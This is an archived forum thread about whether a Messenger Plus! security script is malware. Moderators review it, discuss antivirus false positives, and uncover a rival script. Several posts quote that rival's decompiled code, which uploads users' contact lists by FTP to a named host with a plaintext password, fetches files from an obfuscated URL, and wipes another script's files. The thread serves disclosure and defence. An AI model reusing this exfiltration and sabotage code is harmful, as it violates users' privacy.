WLM Safe 4.0 - What is this! - Printable Version
-Shoutbox (https://shoutbox.menthix.net)
+-- Forum: MsgHelp Archive (/forumdisplay.php?fid=58)
+--- Forum: Messenger Plus! for Live Messenger (/forumdisplay.php?fid=4)
+---- Forum: Scripting (/forumdisplay.php?fid=39)
+----- Thread: WLM Safe 4.0 - What is this! (/showthread.php?tid=89079)
WLM Safe 4.0 - What is this! by BlackStar on 02-09-2009 at 09:55 PM
I just downloaded this new Script called: WLM-Safe-4.0.plsc
There is not much info about and what it does when checking on their website with the name: wlm-safe.uptodown.com
One of the names on this site is "uptodown". To me is it similar to "downdup" that is a very wellknown Trojan.
I just checked the .plsc file on VirusTotal (http://www.virustotal.com/analisis/6c600ae61efd52212f865dbbb19aa287)
And it found this:
a-squared 4.0.0.93 2009.02.09 -
AhnLab-V3 5.0.0.2 2009.02.09 -
AntiVir 7.9.0.76 2009.02.09 -
Authentium 5.1.0.4 2009.02.08 -
Avast 4.8.1335.0 2009.02.09 -
AVG 8.0.0.229 2009.02.09 -
BitDefender 7.2 2009.02.09 -
CAT-QuickHeal 10.00 2009.02.09 -
ClamAV 0.94.1 2009.02.09 -
Comodo 972 2009.02.09 -
DrWeb 4.44.0.09170 2009.02.09 Tool.Prockill
eSafe 7.0.17.0 2009.02.09 Win32.Banker
eTrust-Vet 31.6.6347 2009.02.09 -
F-Prot 4.4.4.56 2009.02.09 -
F-Secure 8.0.14470.0 2009.02.09 -
Fortinet 3.117.0.0 2009.02.09 -
GData 19 2009.02.09 -
Ikarus T3.1.1.45.0 2009.02.09 -
K7AntiVirus 7.10.624 2009.02.09 -
Kaspersky 7.0.0.125 2009.02.09 -
McAfee 5520 2009.02.08 potentially unwanted program PrcViewer
McAfee+Artemis 5521 2009.02.09 potentially unwanted program PrcViewer
Microsoft 1.4306 2009.02.09 -
NOD32 3839 2009.02.09 Win32/PrcView
Norman 6.00.02 2009.02.09 -
nProtect 2009.1.8.0 2009.02.09 -
Panda 9.5.1.2 2009.02.09 -
PCTools 4.4.2.0 2009.02.09 -
Prevx1 V2 2009.02.09 -
Rising 21.15.50.00 2009.02.07 -
SecureWeb-Gateway 6.7.6 2009.02.09 -
Sophos 4.38.0 2009.02.09 -
Sunbelt 3.2.1847.2 2009.02.07 -
Symantec 10 2009.02.09 -
TheHacker 6.3.1.5.250 2009.02.09 Aplicacion/Processor.20
TrendMicro 8.700.0.1004 2009.02.09 PAK_Generic.001
VBA32 3.12.8.12 2009.02.08 -
ViRobot 2009.2.9.1596 2009.02.09 -
VirusBuster 4.5.11.0 2009.02.09 -
Also! I my world this Script sounds to good to be true!
I just made a quick check what is does. And according to the content in this Scripts .reg file and .bat file it is really doing a lot of strange thing!
Perhaps I am way out here so please correct if I am totally wrong.
But. Perhaps a word of warning is in place here!
RE: WLM Safe 4.0 - What is this! by prashker on 02-09-2009 at 10:35 PM
quote: Originally posted by Moh Zayadi
There is nothing wrong about that script as it's in the scripts database. http://www.msgpluslive.net/scripts/view/505-WLM-Safe/
MenthiX is human though, he let a virus accidentally pass through before ;p
Not saying this one is a virus though, as I have not tested or even heard of this script for that matter
RE: WLM Safe 4.0 - What is this! by Menthix on 02-09-2009 at 10:51 PM
Interesting, thank you very much for letting us know.
NOD32 didn't notify me while checking. I've taken the script offline while I check it out.
Version 4.0 was added just a little over an hour ago, never received any complain about the older version. "Potentially unwanted" doesn't sound too harmful.
RE: WLM Safe 4.0 - What is this! by MeEtc on 02-10-2009 at 01:21 AM
http://vil.nai.com/vil/content/v_137331.htm
Just sounds like process control, ability to run and terminate running programs. Has legit uses.
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 02:34 PM
Hello guys,
I'm Vincenzo (Webbolo), the author of WLM Safe.
I've just read MenthiX's mail and i'm here to try understading why my script has been removed from scripts' database.
It took me lot of weeks to realize the new version of my script and nobody ever criticized my scripts.
WLM Safe's code can be viewed by everybody, it is not encrypted in any way. The script only contains:
Path.exe - a program used to determine computer's Paths like the name of main hard drive, the %temp% folder and other folders where malwares can hide.
Process.exe - a program used to to kill - suspend - resume process, and it's used in "remove.bat" file, (as you can see in source code) to kill infected processes or temporary suspend explorer.exe and msnmsgr.exe (which are re-started at the end of the scan) for a better virus remove. Author of this program:
http://www.beyondlogic.org
regist.reg - a .reg file that removes infected registry keys.
I scanned both .exe files with my Kaspersky and they are not infected.
If you want, i could try to change part of my script, but personally i think it's not right to remove a script that i made with an hard work for a long time.
Please, give me more information on what i sould change, but i encourage you to check source code if you want. A sentence like "In my world this Script sounds to good to be true!" doesn't offend me. It makes me think that you're envious and makes me proud of my hard work, insted.
Little Note:
wlm-safe.uptodown.com is NOT my website!
My websites are: www.wlmsafe.com and www.webbolo.net
Thank you all.
RE: WLM Safe 4.0 - What is this! by TheGuruSupremacy on 02-10-2009 at 03:01 PM
I can confirm it's not a virus,only a great script ...Moreover the scan only say that there is a prcviewer(if an av says a program it's virus it doesn't mean it's really a virus)
RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-10-2009 at 03:13 PM
Hi guys!
I'm one of the beta tester of this great script!
I've tried this many times, I've analyzed the code(whit the debugging window of live plus)and I know how does it works!
I'm sure, wlm safe is not a virus..constantly(now it has been downloaded by 2100 users) I HAVEN'T HEARD ANY CRITICAL!
It works greatly..it's not a virus!
Kaspersky doesn't say nothing
Avira antivir too
Avg too
Bitdefender too..
It's not a virus, it's a new tool to BLOCK definitely spam and virus links that spread upon windows live messenger!!
RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-10-2009 at 04:35 PM
Sorry for my English...
but I've tryed the site posted above.
That site http://www.virustotal.com it's an excellent site, but we have to pay attention.
If we go to http://www.virustotal.com/estadisticas.html we discover an important thing.
In the last 24 hours the site received 74188 files and the 30% was NOT infected, that we can understand from this picture(taked from the site)
( the site says:
"This image shows the number of files that have been detected as infected (red) among the total number of files received within the last 24 hours (clean ones marked in blue).")
Now, if we scroll down the page we arrive to an important new image that reveals us an important consideration:
the site describes the image with:
Red: Infected files which one or more antivirus engines failed to detect as a threat.
Blue: Infected files detected by all antivirus engines.
Now we have to think.
With this graphic we discover that every file that is UPLOADED to the site is ALWAYS, i repeat ALWAYS,(the 99%) signed as a treath.
This comes from: the users over internet upload file to the site for a free scan, but every file uploaded(except the 1%) was an "Infected files which one or more antivirus engines failed to detect as a threat."!
Now or every file that was uploaded was a virus and all the antivirus software didn't dedect it or there is always one or more antivirus software that detects the file as a treath!
But with the first image that I posted we discover the truth:
There are always(on that site) FALSE POSITVE,there are ALWAYS file that are REPORTED AS VIRUS from ONE OF the software!
I hope you understood me, I only say that the report posted in this thread is not so valid IMO.
Thanks BlackStar for the reporting, but I think that we have to understand better what the report says.
IMO WLM SAFE is not a Virus, anyway...if you read the code you simply discover that it doesn't do anything illegal!!!!
FREE WLM SAFE!
RE: WLM Safe 4.0 - What is this! by TheGuruSupremacy on 02-10-2009 at 04:41 PM
Well Menthix knows what he does.To prevent the community from being infected He has removed the script while he is checking if it's really dangerous.The script is clean,the exes attacched to the script are not modified and so are clean too but Menthix has to verify that by himself.Just Wait and we will see the script again on the db very soon.Greetings
RE: WLM Safe 4.0 - What is this! by BlackStar on 02-10-2009 at 06:07 PM
@wincy
Thank You very much for Your very relevant answer to some questions about Your script.
Perhaps I am a little paranoid when it comes to and show up some new software that you can't find out what is really does.
Many Antivirus program also gives some false positive, most of us know that, but not all...
But I think it is better to be safe then sorry...
Thanks to Your answer here on this forum we all can now trust Your script and it will probably be a success because if it really works as supposed to, this is something most people will have benefit from.
I am sorry if I gave You problems, but on the other hand...
You gave us all the explanation we needed.
Keep UP The Good Work.
P.S.
Also thank You "Jigen90" and "TheGuruSupremacy" for Your work.
It is good to see that there are people who care!
D.S.
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 07:20 PM
It doesn't matter at all BlackStar, do not worry!
I was just really surprised and a little bit hurted when i discovered that my script had been removed...
I often give a look at threads on this forum and find lot of useful information, and i'm sure of what i've done in my script, that's why i gave a fast reply, in order to make things as clear as possible.
I already know about the famous "Nick Plus" containing a virus, that's why i forgive your doubts!
For any other question or information contact me!
Thanks to Jigen90, TheGuruSupremacy and Moh Zayadi for support!
RE: WLM Safe 4.0 - What is this! by Menthix on 02-10-2009 at 07:53 PM
I'm fairly sure the script works as wincy described, but this doesn't take away the problem: several virus scanners will throw alerts when installing the script. It will be hard for users to trust something that is supposed to remove viruses, while the removal tool itself is picked up by several virusscanners.
The virusscanners have problems with Process.exe and path.exe. From reading what they do I think they could fairly easy be replaced by something else that won't cause alerts.
Instead of process.exe you could use [url-http://technet.microsoft.com/en-us/library/bb491009.aspx]Taskkill[/url] which is part of Windows, so you don't even need to pack it with the script. I checked and it's available on XP, Vista and Win7.
path.exe exports a batch file like this: DOS code: SET "AppData=C:\DOCUME~1\XP_EN-VM\APPLIC~1"
SET "Cookies=C:\DOCUME~1\XP_EN-VM\Cookies"
SET "Desktop=C:\DOCUME~1\XP_EN-VM\Desktop"
SET "Favorites=C:\DOCUME~1\XP_EN-VM\FAVORI~1"
SET "NetHood=C:\DOCUME~1\XP_EN-VM\NetHood"
SET "Personal=C:\DOCUME~1\XP_EN-VM\MYDOCU~1"
SET "PrintHood=C:\DOCUME~1\XP_EN-VM\PRINTH~1"
SET "Recent=C:\DOCUME~1\XP_EN-VM\Recent"
SET "SendTo=C:\DOCUME~1\XP_EN-VM\SendTo"
SET "Start Menu=C:\DOCUME~1\XP_EN-VM\STARTM~1"
SET "Templates=C:\DOCUME~1\XP_EN-VM\TEMPLA~1"
SET "Programs=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs"
SET "Startup=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs\Startup"
SET "Local AppData=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1"
SET "Cache=C:\DOCUME~1\XP_EN-VM\LOCALS~1\TEMPOR~1"
SET "History=C:\DOCUME~1\XP_EN-VM\LOCALS~1\History"
SET "My Pictures=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYPICT~1"
SET "Fonts=C:\WINDOWS\Fonts"
SET "My Music=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYMUSI~1"
SET "CD Burning=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1\MICROS~1\CDBURN~1"
SET "Common AppData=C:\DOCUME~1\ALLUSE~1\APPLIC~1"
SET "Common Programs=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs"
SET "Common Documents=C:\DOCUME~1\ALLUSE~1\DOCUME~1"
SET "Common Desktop=C:\DOCUME~1\ALLUSE~1\Desktop"
SET "Common Start Menu=C:\DOCUME~1\ALLUSE~1\STARTM~1"
SET "Common Pictures=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYPICT~1"
SET "Common Music=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYMUSI~1"
SET "Common Video=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYVIDE~1"
SET "Common Favorites=C:\DOCUME~1\ALLUSE~1\FAVORI~1"
SET "Common Startup=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup"
SET "Common Templates=C:\DOCUME~1\ALLUSE~1\TEMPLA~1"
SET "Common Administrative Tools=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\ADMINI~1"
I see you use some of those variables later in the batch file (not all). I'm not sure why eSafe and TrendMicro would pick this up. Do you have the source, or did you download it somewhere? This could probably be replaced by JScript too (some other scripter help out on this?).
BTW, two other things:- You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Why do you delete ""Cila Smart Security" in safe.bat?
For people who want to take a look, temporary download location: http://random.menthix.net/temp/WLM-Safe-4.0.plsc
RE: WLM Safe 4.0 - What is this! by wincy on 02-10-2009 at 09:28 PM
Hi MenthiX, thank for you reply!
I've made up tests with more than one anti-virus before using programs i downloaded from Internet.
They're quite commons and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?
Thanks for your your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated!
Other things:
quote: You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?
quote: Why do you delete ""Cila Smart Security" in safe.bat?
- I delete Cila Smart Security for two reasons:
- Cila's script is not compatibile with WLM Safe, and it also runs this code:
case "delws":
fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe'); break;
case "inire":
kickWLMsafe();
MsgPlus.AddTimer("inire", 60000); break;
function kickWLMsafe() {
if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
ErrorNN("821", "WLM Safe");
TraceIA(RLFF(LangT, 83))
}
}
function DelWLMS() {
var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
fileObj.Write('');
fileObj.Close();
fileObjA.Write('');
fileObjA.Close();
MsgPlus.AddTimer("delws", 3000)
}
- In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
function MakeConfigEMAIL() {
Trace("0x222222224");
var sssp = Messenger.MyEmail;
var Contacts = Messenger.MyContacts;
var e = new Enumerator(Contacts);
for (; ! e.atEnd(); e.moveNext()) {
var Contact = e.item();
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
}
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
UpCEMAIL()
}
function UpCEMAIL() {
ftpweb = "ftp.cilacorp.x10hosting.com";
Trace("0x2777777777");
for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
}
}
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
Thanks to all for comprehension, replies and support.
RE: WLM Safe 4.0 - What is this! by NiteMare on 02-11-2009 at 04:13 AM
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
RE: WLM Safe 4.0 - What is this! by roflmao456 on 02-11-2009 at 05:43 AM
* roflmao456 is sniffing some script rivalry coming up o.0
Oh and the ftp login doesn't work
RE: RE: WLM Safe 4.0 - What is this! by Jigen90 on 02-11-2009 at 09:29 AM
quote: Originally posted by roflmao456
Oh and the ftp login doesn't work
I've seen that code and the ftp login has worked till 1 or 2 months ago!
There were 3 o 4 lists of messenger contacts.
I've seen the site, it worked with that password!!
Now it doesn't work...strange!?!?! ...something wrong!?
RE: RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 01:22 PM
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
I was misunderstood, they copy part of my xml file, AND ALSO they pick up users' contact lists.
Here is a screen of my old script version's window and their actual window:
The code is also copy and pasted without changes.
I've never stolen contact lists because i think it is really a privacy violation!
You can check all previous versions of my script, if you want.
Source codes are short, simple, and not encrypted in any way.
Cila Smart Security is totally encripted, that's why maybe they have something to hide...
I realized that it was an unsafe script when i discovered that about 2 months ago ftp server could be accessed by anyone (even by spammers for example!) with a simple FTP program.
Everybody can check out old version (3.5) here:
http://www.wlmsafe.com/download2.php
More that 24.000 have downloaded that version and it has always been appreciated.
RE: WLM Safe 4.0 - What is this! by vaccination on 02-11-2009 at 01:50 PM
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
A different script did it, not his. So he was combating the invasion of privacy by removing the functions of that script if it was installed on the users PC.
RE: WLM Safe 4.0 - What is this! by Moh on 02-11-2009 at 02:13 PM
If it is that suspicious then why is Cila Security is still in the database? o.0
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 02:17 PM
Because it is not detected as a virus.
But is encrypted with function(p,a,c,k,e,r) (javascript compression)
and maybe nobody ever seen the real code.
If you're interested in, here is decripted .js file:
http://myfreefilehosting.com/f/ce2d27c610_0.1MB
You can file all functions i quoted above.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 02:57 PM
js code: if (Success && Url == "h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t") {
Suspicious
js code: function kickWLMsafe() {
if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
ErrorNN("821", "WLM Safe");
TraceIA(RLFF(LangT, 83))
}
}
function DelWLMS() {
var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
fileObj.Write('');
fileObj.Close();
fileObjA.Write('');
fileObjA.Close();
MsgPlus.AddTimer("delws", 3000)
}
Instant removal. No script should affect any other script in any way
js code: MsgPlus.DownloadFile("h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t", TempFolder + "\\" + Messenger.MyEmail + ".dat")
Again, Suspicious
Also, it uses my "Clone Warning!" script, which in itself isn't usually a problem for people to use my code. However, in this case it's the whole script with my messagebox replaced with another function
EDIT: I think I might make a better version of this myself. One we all know is going to be safe.
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:06 PM
They also stole (exact copy&paste) my code.
I allow anyone to take inspiration from my work, but it's not funny if someone does an exact clone of scripts.
Anyway, i'm not asking to remove cila's script, i just would my script to be re-inserted in scripts' database.
If i have to change something before, i will do it as soon as possible.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 03:15 PM
quote: Originally posted by wincy
Anyway, i'm not asking to remove cila's script, i just would my script to be re-inserted in scripts' database.
If i have to change something before, i will do it as soon as possible.
IMO, they should be substituted...
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:29 PM
Maybe someone should sent a notification to Cila's authors?
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 03:36 PM
quote: Originally posted by wincy
Maybe someone should sent a notification to Cila's authors?
I'm assuming Menthix contacted you to let you know your script was removed temporarily. He would do the same thing for Cila so they could try to explain it too...
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 03:42 PM
That's correct. We'll wait for MenthiX then!
I Hope that he will make things go in right way.
RE: WLM Safe 4.0 - What is this! by Menthix on 02-11-2009 at 08:23 PM
There are indeed strange things going on in Cila Smart Security, I deleted the script and will mail the author right after posting this.
BTW: I decoded the current version of WLM Safe, but the code seemed different, is the Engine.js you uploaded from an older version? Also, I'd like to know what you used to keep formatting intact when decrypting. Everything I tried results in all code on a single line.
I have no problem putting WLMSafe back if you make a few changes: - Stop deleting "Cila Smart Security", no script should delete or disable another script. You'll be happy to know Smart Security won't be coming back to the site as long as it interferes with WLMSafe.
- Update yous batch file so it will work when Plus! is installed in a non-standard folder. You probably don't really need to prefix the foll installation folder since all the files you cann are in the same folder. But if you do, you can call MsgPlus:criptFilesPath, see the scripts documentation.
- Replace process.exe by something that won't trigger virusscanners, Taskkill shouls be suitable.
- Replace path.exe by something that won't trigger virusscanners, you should be able to produce the same result in JScript. If you need help with that you can always post a thread here and ask other scripters for a little help.
RE: WLM Safe 4.0 - What is this! by Spunky on 02-11-2009 at 08:31 PM
quote: Originally posted by MenthiX
BTW: I decoded the current version of WLM Safe, but the code seemed different, is the Engine.js you uploaded from an older version? Also, I'd like to know what you used to keep formatting intact when decrypting. Everything I tried results in all code on a single line.
If I understood it correctly, that is the Cila script he posted. As for formatting, you may need to open it in Wordpad and save it again to regain formatting.
RE: WLM Safe 4.0 - What is this! by Menthix on 02-11-2009 at 08:45 PM
quote: Originally posted by Spunky
If I understood it correctly, that is the Cila script he posted.
It is, I meant it's different from the latest Cila Smart Security that was in the DB.
quote: Originally posted by Spunky
As for formatting, you may need to open it in Wordpad and save it again to regain formatting.
Well, the way I decoded was quite lazy. In Firefox:
1. Copy the eval packed JS. something like —- eval(function(p,a,c,k,e,d){e=function …………………. }
2. Open Error Console on your firefox
3. Paste the packed JS in Code input tab
4. Add eval = alert; at the beginning of the code
5. Hit Evaluate
I don't think you can any formatting/line breaks back into that result.
RE: WLM Safe 4.0 - What is this! by wincy on 02-11-2009 at 09:09 PM
Thanks for your reply MenthiX!
Engine.js i posted is from the last version of Cila Smart Security.
You can unpack it very fast by splitting the file into the various "eval(function(p,a,c,k,e,r){... ecc".
Then go here: http://www.webbolo.net/unpacker.html
Copy each function in the box and hit Decode.
You'll get the unpacked function. Then you can beautify code using this: http://jsbeautifier.org
And you should get exactly the file i posted above.
1) I'm gonna stop deleting Cila smart security, as i hope they will be advise to do the same with my script.
2) I tried not to use Messenger Plus' path but didn't work, maybe because batch files are opened by script and not by clicking directly. I'll try to adjust them.
3) I will also use TaskKill, but really don't know how to determine specials computer's Paths as the exe does... If someone reading this post does know the way, please help. Otherwise i'll post a thread on forum!
Thank you all.
wincy
Thanks! by wincy on 05-25-2009 at 05:08 PM
I've just released WLM Safe 5.0
A Big thanks to Menthix for making it a featured script!
I made it without using external exe file and generally improved almost everything.
I hope it will really help people fighting the spread of dangerous or annoying links!
If someone want to try it, here's the link:
http://www.msgpluslive.net/scripts/view/505-WLM-Safe
( comments/suggestions will be appreciated! )
RE: WLM Safe 4.0 - What is this! by BlackStar on 05-25-2009 at 06:21 PM
Nice done, nice work!
I think I will trust this version now
According to Virustotal there was only one result:
AntiVir 7.9.0.168 2009.05.25 HEUR/HTML.Malware
According to Avira:
quote: A heuristic detection might be a false identification if one or more of the following are true:
- The site hosting the detected file has been accessed for a very long time and is known to the user
- The detected file is from a trustworthy source
RE: WLM Safe 4.0 - What is this! by wincy on 05-25-2009 at 07:33 PM
Thanks for your trust!
RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-25-2009 at 07:49 PM
few things came to my mind after reading this thread:
- Personally I will never use a script which uses EXEs and BATs in such a way, safe or not. Everything those EXEs and BATs do can easly be done with a few lines of scripting code.
- quote: Originally posted by Menthix
I have no problem putting WLMSafe back if you make a few changes:- Stop deleting "Cila Smart Security", no script should delete or disable another script. You'll be happy to know Smart Security won't be coming back to the site as long as it interferes with WLMSafe.
If all the stuff posted here about "Cila Smart Security" is true then WLMSafe has every right to instantly remove every trace of it (and be listed in the DB) and "Cila Smart Security" (and its author) should be banned from the DB as it very obviously has malicious intends.
- uploading Plus! scripts to online virusscanners is not a fool proof method. For starters, online scanners usually are made for checking EXEs and COMs, not javascript. Second, there are a lot of Plus! specific objects in Plus! scripting which no virusscanner will reconize, yet might be very dangerous. Uploading the accompanying program files like those EXEs to online scanners is a much better thing to do.
- Again about "Cila Smart Security". See private forum...
RE: WLM Safe 4.0 - What is this! by Menthix on 05-25-2009 at 08:02 PM
You're reading a mostly old thread Cookie .
- The current WLM Safe version does not use any exe/bat.
- All of Cila's scripts were removed months ago
RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-25-2009 at 08:12 PM
I know it is an old thread and that WLMSafe has been updated and Cila's scripts have been removed, but that doesn't matter. Those aren't the issues here, those things are only examples of issues which are still very valid for any futur script. Hence why I made that post.
- About script using EXEs, COMs => I still feel the same about them. And in 99,999% of all cases those programs can all be replaced with simple script code.
- About that policy that WLMSafe was removed because it 'touched' another (malicious) script => As I said, I rather have a security script doing the same thing with another malicious script in the DB as WLMSafe did than to seeing a perfect valid script being removed because it tries to protect a user from malicious stuff simply because it 'touches' another script.
In such cases that policy is seriously flawed and actually harms the user and an excepting should be made. Even if the malicous script has been removed from the official DB, it might still float around other download sites. Enforcing that policy to the letter makes that people using scripts like WLMSafe are not protected to such particular scripts.
- My comments about uploading scripts to online scanners is still valid.
- Last point, see private forum.
RE: WLM Safe 4.0 - What is this! by wta121 on 05-26-2009 at 11:37 AM
This script sound really good for me, but it wont work! m
When I click to install it, it works, but then it says that parts of it are locked and I need to restart messenger! So I click OK, then a few moments later, I get this attached message. I've tried again and again and It wont work! this script sounds really good can someone help me please!
RE: WLM Safe 4.0 - What is this! by wincy on 05-26-2009 at 11:57 AM
I just want you to know that i made a function that removes CilaSmartSecurity only because it is an unsafe script and also because that script had a similar function.
I never wanted to delete other script only because are similar to mine or comes in conflict with it!
However that function there is no longer in version 5.0.
What's in private forum about Cila? Here is the author:
http://foro.msgpluslive.es/member.php?action=profile&uid=16822
"Los mejores programas que te puedas imaginar son creados con las peores intenciones." he sais...
wta121, what's in Script Debug window?
Does it give you any error? What Messenger version do you have?
PM me
RE: RE: WLM Safe 4.0 - What is this! by CookieRevised on 05-26-2009 at 01:30 PM
quote: Originally posted by wincy
I just want you to know that i made a function that removes CilaSmartSecurity only because it is an unsafe script and also because that script had a similar function.
I never wanted to delete other script only because are similar to mine or comes in conflict with it!
However that function there is no longer in version 5.0.
Those are all the right reasons imho and thus I find it too bad that you had to remove that function, because that script from Cila is still available on 3rd party sites.
quote: Originally posted by wincy
What's in private forum about Cila?
Not so much about Cila itself, but more about the general issue.
|